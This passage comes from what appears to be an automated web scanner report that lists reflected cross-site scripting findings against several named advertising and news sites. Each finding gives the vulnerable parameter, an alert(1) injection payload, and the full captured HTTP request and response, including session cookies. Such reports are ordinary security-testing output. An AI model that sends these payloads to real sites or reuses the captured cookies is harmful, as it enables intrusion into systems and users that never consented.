Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/commonlink.php?accountid=200106286435&template=253566&urid=6979962faa'%3balert(1)//57357bc1d12&estara_fsguid=0DC1EAC72231C3B51F226785010C6827&host=as00.estara.com&fromrules=1&dnc=1296742159.25144911407943 HTTP/1.1
Host: as00.estara.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fscookies=b64_VcxNDsIgEAXg27CrgWF.YMFZDCpJGy0ai-e3IbYdZ-fyvXlgrbMMgdFTchBZEMAGky.tLA2Unt.53upnTownRxHJbsfBrEUaxqktyRvGdec-PF.l7mHO7TqWjlHi0exha8agNnrYRVj-sBbUglpIC2kRLXJICGqth588pnofmEicT-AF; fsserver__SESSION____SECURE__=c-7301.estara.com; fsserver__SESSION__=c-7301.estara.com; fs_nocache_guid=0DC1EAC72231C3B51F226785010C6827;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Last-Modified: Thu, 03 Feb 2011 14:15:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: fscookies=b64_lY9BDsIgEEVPQ3caGJgZWLBx4TUMVYyNLTUV729TtY5LCZuX9-8PgNZGE3hyFqOBQOwAtG9SW-O9grCHKZVTeQyR3NZgcKg-h3wzB3Fz6eo92obcvPML4y2XFYZUj5e8yMDhm1zgkwxebCywGibZIWmcNE4alAalYWn4a7wXawu8Td.V64YQ2dgIr2cTnFNSwMruUp.nqsAbBUHBfr7IFrk9mpOB9e-mz177qHUsc.8J; expires=Tue, 02-Feb-2016 14:15:59 GMT; path=/UI/; domain=.estara.com
Connection: close
Content-Type: application/x-javascript
Content-Length: 34262

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_accountid"]="
...[SNIP]...
=500;wv_vars["ui_height"]=500;wv_start(wv_argscopy);wv_vars["ui_width"]=prev_ui_width;wv_vars["ui_height"]=prev_ui_height;}setTimeout('eStaraCookieDictionaryDelete(\'estaracookie\', \'rule_action_6979962faa';alert(1)//57357bc1d12\', true, null);', 1000);var wv_available = true;
if (typeof(wv_available_vars) == 'undefined') wv_available_vars = new Array();
wv_available_vars['253566'] = true;
if (typeof(wv_vars)=="undefined")
...[SNIP]...

1.69. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f8470<script>alert(1)</script>d3eebd4205c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2f8470<script>alert(1)</script>d3eebd4205c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:20 GMT
Date: Thu, 03 Feb 2011 16:08:20 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2f8470<script>alert(1)</script>d3eebd4205c", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.70. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 961a2<script>alert(1)</script>f667e8d66a2 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=9319&c5=&c6=&c10=3209360961a2<script>alert(1)</script>f667e8d66a2&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 18:53:46 GMT
Date: Thu, 03 Feb 2011 18:53:46 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"9319", c5:"", c6:"", c10:"3209360961a2<script>alert(1)</script>f667e8d66a2", c15:"", c16:"", r:""});

1.71. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 78a58<script>alert(1)</script>157d4440e69 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=&c15=78a58<script>alert(1)</script>157d4440e69 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:24 GMT
Date: Thu, 03 Feb 2011 16:08:24 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"78a58<script>alert(1)</script>157d4440e69", c16:"", r:""});

1.72. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 45f85<script>alert(1)</script>5d73e5872e0 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=603578645f85<script>alert(1)</script>5d73e5872e0&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:20 GMT
Date: Thu, 03 Feb 2011 16:08:20 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"603578645f85<script>alert(1)</script>5d73e5872e0", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.73. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c039a<script>alert(1)</script>445d1c22264 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786c039a<script>alert(1)</script>445d1c22264&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:21 GMT
Date: Thu, 03 Feb 2011 16:08:21 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786c039a<script>alert(1)</script>445d1c22264", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.74. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 257a9<script>alert(1)</script>4757a91e5f0 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=257a9<script>alert(1)</script>4757a91e5f0&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:22 GMT
Date: Thu, 03 Feb 2011 16:08:22 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"257a9<script>alert(1)</script>4757a91e5f0", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.75. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1f462<script>alert(1)</script>398a6a54a7c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=1f462<script>alert(1)</script>398a6a54a7c&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:22 GMT
Date: Thu, 03 Feb 2011 16:08:22 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"", c5:"1f462<script>alert(1)</script>398a6a54a7c", c6:"", c10:"", c15:"", c16:"", r:""});

1.76. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6daaf<script>alert(1)</script>1ad5ede9ace was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=&c5=&c6=6daaf<script>alert(1)</script>1ad5ede9ace&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 10 Feb 2011 16:08:23 GMT
Date: Thu, 03 Feb 2011 16:08:23 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"6daaf<script>alert(1)</script>1ad5ede9ace", c10:"", c15:"", c16:"", r:""});

1.77. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71024'%3balert(1)//daafc6b74fc was submitted in the admeld_adprovider_id parameter. This input was echoed as 71024';alert(1)//daafc6b74fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=871024'%3balert(1)//daafc6b74fc&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:17 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Thu, 03 Feb 2011 18:54:17 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=871024';alert(1)//daafc6b74fc&external_user_id=gFEcJzqCjXJj&_segment=2%7CgFEcJzqCjXJj%7C"/>');

1.78. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad9f'%3balert(1)//03ee31b5e06 was submitted in the admeld_callback parameter. This input was echoed as 9ad9f';alert(1)//03ee31b5e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9ad9f'%3balert(1)//03ee31b5e06 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:28 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Thu, 03 Feb 2011 18:54:27 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9ad9f';alert(1)//03ee31b5e06?admeld_adprovider_id=8&external_user_id=gFEcJzqCjXJj&_segment=2%7CgFEcJzqCjXJj%7C"/>');

1.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://business-news.thestreet.com
Path:   /ocregister

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b12"><script>alert(1)</script>c8944471237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ocregister?b9b12"><script>alert(1)</script>c8944471237=1 HTTP/1.1
Host: business-news.thestreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=0
Last-Modified: Thu, 03 Feb 2011 19:04:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie, Accept-Encoding
ETag: "1296759876"
Content-Type: text/html; charset=utf-8
Content-Length: 65305
X-Served-By: pmisccache01.dc.thestreet.com
Date: Thu, 03 Feb 2011 19:04:38 GMT
X-Varnish: 209384145
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Date Created: 20110203 14:04:38 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<a href="/ocregister?b9b12"><script>alert(1)</script>c8944471237=1/story/10-terrible-financial-choices-in-music-history/10993786">
...[SNIP]...

1.80. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693e2"%3balert(1)//dacff80c547 was submitted in the $ parameter. This input was echoed as 693e2";alert(1)//dacff80c547 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=693e2"%3balert(1)//dacff80c547&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; 